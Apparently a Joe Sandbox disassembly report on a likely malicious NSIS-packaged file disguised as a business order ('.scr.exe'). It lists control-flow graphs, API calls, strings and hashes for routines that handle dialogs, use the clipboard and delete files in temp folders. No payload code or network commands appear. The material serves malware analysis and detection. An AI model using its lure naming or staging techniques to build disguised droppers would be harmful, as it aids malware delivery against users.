                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                            • String ID: "$"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nonopposable\ff4$C:\Users\user\AppData\Local\Temp\nonopposable\ff4$C:\Users\user\Desktop$C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                            • API String ID: 1813718867-74311805
                                                                                            • Opcode ID: 29aa30fcb600f5c8a5383c7116afafb794e17da889116137ed8fec584551b587
                                                                                            • Instruction ID: bee44f309595f2ff458e9cecae568de25c9667724a66d0f49069eb89ae1a0629
                                                                                            • Opcode Fuzzy Hash: 29aa30fcb600f5c8a5383c7116afafb794e17da889116137ed8fec584551b587
                                                                                            • Instruction Fuzzy Hash: FDF10170204301ABD720AF659D05B2B3EE8EB8570AF11483EF581B62D1DB7DCA45CB6E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 151 4056e5-405700 152 405706-4057cd GetDlgItem * 3 call 4044d5 call 404e2e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 40588f-405896 151->153 171 4057eb-4057ee 152->171 172 4057cf-4057e9 SendMessageW * 2 152->172 155 4058c0-4058cd 153->155 156 405898-4058ba GetDlgItem CreateThread CloseHandle 153->156 157 4058eb-4058f5 155->157 158 4058cf-4058d5 155->158 156->155 162 4058f7-4058fd 157->162 163 40594b-40594f 157->163 160 405910-405919 call 404507 158->160 161 4058d7-4058e6 ShowWindow * 2 call 4044d5 158->161 175 40591e-405922 160->175 161->157 168 405925-405935 ShowWindow 162->168 169 4058ff-40590b call 404479 162->169 163->160 166 405951-405957 163->166 166->160 173 405959-40596c SendMessageW 166->173 176 405945-405946 call 404479 168->176 177 405937-405940 call 4055a6 168->177 169->160 178 4057f0-4057fc SendMessageW 171->178 179 4057fe-405815 call 4044a0 171->179 172->171 180 405972-40599d CreatePopupMenu call 40655e AppendMenuW 173->180 181 405a6e-405a70 173->181 176->163 177->176 178->179 190 405817-40582b ShowWindow 179->190 191 40584b-40586c GetDlgItem SendMessageW 179->191 188 4059b2-4059c7 TrackPopupMenu 180->188 189 40599f-4059af GetWindowRect 180->189 181->175 188->181 192 4059cd-4059e4 188->192 189->188 193 40583a 190->193 194 40582d-405838 ShowWindow 190->194 191->181 195 405872-40588a SendMessageW * 2 191->195 196 4059e9-405a04 SendMessageW 192->196 197 405840-405846 call 4044d5 193->197 194->197 195->181 196->196 198 405a06-405a29 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a2b-405a52 SendMessageW 198->200 200->200 201 405a54-405a68 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405743
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405752
                                                                                            • GetClientRect.USER32(?,?), ref: 0040578F
                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405796
                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B7
                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C8
                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057DB
                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E9
                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FC
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581E
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405832
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405853
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405863
                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587C
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405888
                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405761
                                                                                              • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,00000001,00404300), ref: 004044E3
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004058A5
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005679,00000000), ref: 004058B3
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004058BA
                                                                                            • ShowWindow.USER32(00000000), ref: 004058DE
                                                                                            • ShowWindow.USER32(?,00000008), ref: 004058E3
                                                                                            • ShowWindow.USER32(00000008), ref: 0040592D
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405961
                                                                                            • CreatePopupMenu.USER32 ref: 00405972
                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405986
                                                                                            • GetWindowRect.USER32(?,?), ref: 004059A6
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BF
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F7
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405A07
                                                                                            • EmptyClipboard.USER32 ref: 00405A0D
                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A19
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A23
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A37
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A57
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A62
                                                                                            • CloseClipboard.USER32 ref: 00405A68
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: {
                                                                                            • API String ID: 590372296-366298937
                                                                                            • Opcode ID: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                            • Instruction ID: bfdbfabbc3eccdd340dcac883e36f8678c6b127a6a9b52dc92d7db9eae4071ee
                                                                                            • Opcode Fuzzy Hash: bcd6524ca319c6da9779c5e50c73cceb5f6d9afdf0ecbcca2ead9855fe138ddf
                                                                                            • Instruction Fuzzy Hash: FBB127B1900618FFDB11AF60DD89AAE7B79FB44354F00813AFA41B61A0CB754A92DF58

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 509 405c2d-405c53 call 405ef8 512 405c55-405c67 DeleteFileW 509->512 513 405c6c-405c73 509->513 514 405de9-405ded 512->514 515 405c75-405c77 513->515 516 405c86-405c96 call 406521 513->516 517 405d97-405d9c 515->517 518 405c7d-405c80 515->518 522 405ca5-405ca6 call 405e3c 516->522 523 405c98-405ca3 lstrcatW 516->523 517->514 521 405d9e-405da1 517->521 518->516 518->517 524 405da3-405da9 521->524 525 405dab-405db3 call 40687e 521->525 526 405cab-405caf 522->526 523->526 524->514 525->514 532 405db5-405dc9 call 405df0 call 405be5 525->532 529 405cb1-405cb9 526->529 530 405cbb-405cc1 lstrcatW 526->530 529->530 533 405cc6-405ce2 lstrlenW FindFirstFileW 529->533 530->533 549 405de1-405de4 call 4055a6 532->549 550 405dcb-405dce 532->550 535 405ce8-405cf0 533->535 536 405d8c-405d90 533->536 537 405d10-405d24 call 406521 535->537 538 405cf2-405cfa 535->538 536->517 540 405d92 536->540 551 405d26-405d2e 537->551 552 405d3b-405d46 call 405be5 537->552 541 405cfc-405d04 538->541 542 405d6f-405d7f FindNextFileW 538->542 540->517 541->537 545 405d06-405d0e 541->545 542->535 548 405d85-405d86 FindClose 542->548 545->537 545->542 548->536 549->514 550->524 553 405dd0-405ddf call 4055a6 call 4062e1 550->553 551->542 554 405d30-405d39 call 405c2d 551->554 562 405d67-405d6a call 4055a6 552->562 563 405d48-405d4b 552->563 553->514 554->542 562->542 566 405d4d-405d5d call 4055a6 call 4062e1 563->566 567 405d5f-405d65 563->567 566->542 567->542
                                                                                            APIs
                                                                                            • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405C56
                                                                                            • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405C9E
                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405CC1
                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405CC7
                                                                                            • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405CD7
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D77
                                                                                            • FindClose.KERNEL32(00000000), ref: 00405D86
                                                                                            Strings
                                                                                            • \*.*, xrefs: 00405C98
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C3A
                                                                                            • "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", xrefs: 00405C36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                            • API String ID: 2035342205-2875471304
                                                                                            • Opcode ID: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                            • Instruction ID: aec485693c4c1533f42b9347a66a6bbcb57ea8568fe9c979ecac7928daa7b7f5
                                                                                            • Opcode Fuzzy Hash: 9251ba415d381c0528a68256adb7b13e134a55f337ff098e8b7b00a93e79b23f
                                                                                            • Instruction Fuzzy Hash: 8741D230801A14BADB31BB659D4DAAF7678EF41718F14813FF801B11D5D77C8A829EAE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 730 40687e-406892 FindFirstFileW 731 406894-40689d FindClose 730->731 732 40689f 730->732 733 4068a1-4068a2 731->733 732->733
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                            • FindClose.KERNEL32(00000000), ref: 00406895
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp, xrefs: 0040687E
                                                                                            • X_B, xrefs: 0040687F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFileFirst
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp$X_B
                                                                                            • API String ID: 2295610775-1095464576
                                                                                            • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                            • Instruction ID: 6d56574ea64d1328abe48e6f64e5cab5a12c2004fb3b9259b4ed260009733db8
                                                                                            • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                                            • Instruction Fuzzy Hash: AFD0123250A5205BC6406B386E0C84B7A58AF553717268A36F5AAF21E0CB788C6696AC

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 734 406c3f-406c44 735 406cb5-406cd3 734->735 736 406c46-406c75 734->736 739 4072ab-4072c0 735->739 737 406c77-406c7a 736->737 738 406c7c-406c80 736->738 740 406c8c-406c8f 737->740 741 406c82-406c86 738->741 742 406c88 738->742 743 4072c2-4072d8 739->743 744 4072da-4072f0 739->744 745 406c91-406c9a 740->745 746 406cad-406cb0 740->746 741->740 742->740 747 4072f3-4072fa 743->747 744->747 748 406c9c 745->748 749 406c9f-406cab 745->749 750 406e82-406ea0 746->750 751 407321-40732d 747->751 752 4072fc-407300 747->752 748->749 756 406d15-406d43 749->756 754 406ea2-406eb6 750->754 755 406eb8-406eca 750->755 759 406ac3-406acc 751->759 757 407306-40731e 752->757 758 4074af-4074b9 752->758 760 406ecd-406ed7 754->760 755->760 762 406d45-406d5d 756->762 763 406d5f-406d79 756->763 757->751 761 4074c5-4074d8 758->761 765 406ad2 759->765 766 4074da 759->766 768 406ed9 760->768 769 406e7a-406e80 760->769 767 4074dd-4074e1 761->767 764 406d7c-406d86 762->764 763->764 771 406d8c 764->771 772 406cfd-406d03 764->772 773 406ad9-406add 765->773 774 406c19-406c3a 765->774 775 406b7e-406b82 765->775 776 406bee-406bf2 765->776 766->767 788 407461-40746b 768->788 789 406e5f-406e77 768->789 769->750 770 406e1e-406e28 769->770 782 40746d-407477 770->782 783 406e2e-406ff7 770->783 794 406ce2-406cfa 771->794 795 407449-407453 771->795 784 406db6-406dbc 772->784 785 406d09-406d0f 772->785 773->761 779 406ae3-406af0 773->779 774->739 786 406b88-406ba1 775->786 787 40742e-407438 775->787 780 406bf8-406c0c 776->780 781 40743d-407447 776->781 779->766 790 406af6-406b3c 779->790 791 406c0f-406c17 780->791 781->761 782->761 783->739 783->759 792 406e1a 784->792 793 406dbe-406ddc 784->793 785->756 785->792 797 406ba4-406ba8 786->797 787->761 788->761 789->769 798 406b64-406b66 790->798 799 406b3e-406b42 790->799 791->774 791->776 792->770 800 406df4-406e06 793->800 801 406dde-406df2 793->801 794->772 795->761 797->775 802 406baa-406bb0 797->802 808 406b74-406b7c 798->808 809 406b68-406b72 798->809 805 406b44-406b47 GlobalFree 799->805 806 406b4d-406b5b GlobalAlloc 799->806 807 406e09-406e13 800->807 801->807 803 406bb2-406bb9 802->803 804 406bda-406bec 802->804 810 406bc4-406bd4 GlobalAlloc 803->810 811 406bbb-406bbe GlobalFree 803->811 804->791 805->806 806->766 812 406b61 806->812 807->784 813 406e15 807->813 808->797 809->808 809->809 810->766 810->804 811->810 812->798 815 407455-40745f 813->815 816 406d9b-406db3 813->816 815->761 816->784
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                            • Instruction ID: 98dfc50ccd9688b87079ede1b44bfc78bfb7a95d74622a08e623e0ee65e5f8c5
                                                                                            • Opcode Fuzzy Hash: 8964584eaf82ae0cb152a3b9d71f3809ce5605a589357672a1976e67bd0135b4
                                                                                            • Instruction Fuzzy Hash: B2F17870D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 202 403fa1-403fb3 203 403fb9-403fbf 202->203 204 40411a-404129 202->204 203->204 205 403fc5-403fce 203->205 206 404178-40418d 204->206 207 40412b-404173 GetDlgItem * 2 call 4044a0 SetClassLongW call 40140b 204->207 210 403fd0-403fdd SetWindowPos 205->210 211 403fe3-403fea 205->211 208 4041cd-4041d2 call 4044ec 206->208 209 40418f-404192 206->209 207->206 221 4041d7-4041f2 208->221 213 404194-40419f call 401389 209->213 214 4041c5-4041c7 209->214 210->211 216 403fec-404006 ShowWindow 211->216 217 40402e-404034 211->217 213->214 238 4041a1-4041c0 SendMessageW 213->238 214->208 220 40446d 214->220 222 404107-404115 call 404507 216->222 223 40400c-40401f GetWindowLongW 216->223 224 404036-404048 DestroyWindow 217->224 225 40404d-404050 217->225 227 40446f-404476 220->227 234 4041f4-4041f6 call 40140b 221->234 235 4041fb-404201 221->235 222->227 223->222 236 404025-404028 ShowWindow 223->236 228 40444a-404450 224->228 230 404052-40405e SetWindowLongW 225->230 231 404063-404069 225->231 228->220 241 404452-404458 228->241 230->227 231->222 237 40406f-40407e GetDlgItem 231->237 234->235 242 404207-404212 235->242 243 40442b-404444 DestroyWindow EndDialog 235->243 236->217 244 404080-404097 SendMessageW IsWindowEnabled 237->244 245 40409d-4040a0 237->245 238->227 241->220 246 40445a-404463 ShowWindow 241->246 242->243 247 404218-404265 call 40655e call 4044a0 * 3 GetDlgItem 242->247 243->228 244->220 244->245 249 4040a2-4040a3 245->249 250 4040a5-4040a8 245->250 246->220 274 404267-40426c 247->274 275 40426f-4042ab ShowWindow KiUserCallbackDispatcher call 4044c2 EnableWindow 247->275 252 4040d3-4040d8 call 404479 249->252 253 4040b6-4040bb 250->253 254 4040aa-4040b0 250->254 252->222 257 4040f1-404101 SendMessageW 253->257 259 4040bd-4040c3 253->259 254->257 258 4040b2-4040b4 254->258 257->222 258->252 262 4040c5-4040cb call 40140b 259->262 263 4040da-4040e3 call 40140b 259->263 272 4040d1 262->272 263->222 271 4040e5-4040ef 263->271 271->272 272->252 274->275 278 4042b0 275->278 279 4042ad-4042ae 275->279 280 4042b2-4042e0 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 4042e2-4042f3 SendMessageW 280->281 282 4042f5 280->282 283 4042fb-40433a call 4044d5 call 403f82 call 406521 lstrlenW call 40655e SetWindowTextW call 401389 281->283 282->283 283->221 294 404340-404342 283->294 294->221 295 404348-40434c 294->295 296 40436b-40437f DestroyWindow 295->296 297 40434e-404354 295->297 296->228 298 404385-4043b2 CreateDialogParamW 296->298 297->220 299 40435a-404360 297->299 298->228 301 4043b8-40440f call 4044a0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->301 299->221 300 404366 299->300 300->220 301->220 306 404411-404424 ShowWindow call 4044ec 301->306 308 404429 306->308 308->228
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FDD
                                                                                            • ShowWindow.USER32(?), ref: 00403FFD
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040400F
                                                                                            • ShowWindow.USER32(?,00000004), ref: 00404028
                                                                                            • DestroyWindow.USER32 ref: 0040403C
                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404055
                                                                                            • GetDlgItem.USER32(?,?), ref: 00404074
                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404088
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040408F
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040413A
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404144
                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040415E
                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041AF
                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404255
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404276
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404288
                                                                                            • EnableWindow.USER32(?,?), ref: 004042A3
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B9
                                                                                            • EnableMenuItem.USER32(00000000), ref: 004042C0
                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D8
                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042EB
                                                                                            • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404315
                                                                                            • SetWindowTextW.USER32(?,00422F08), ref: 00404329
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040445D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 121052019-0
                                                                                            • Opcode ID: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                            • Instruction ID: 6cd4652e30ec862c23bd12a6162173760bab2c1fa5186c41ecc3a298f9dddab8
                                                                                            • Opcode Fuzzy Hash: f0b43cd8e7f2e41f431c118fff2888e9d111a3339ebed408ace792690fb64996
                                                                                            • Instruction Fuzzy Hash: 7FC1C0B1600204ABDB216F21EE49E2B3A69FB94709F41053EF751B51F0CB795882DB2E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
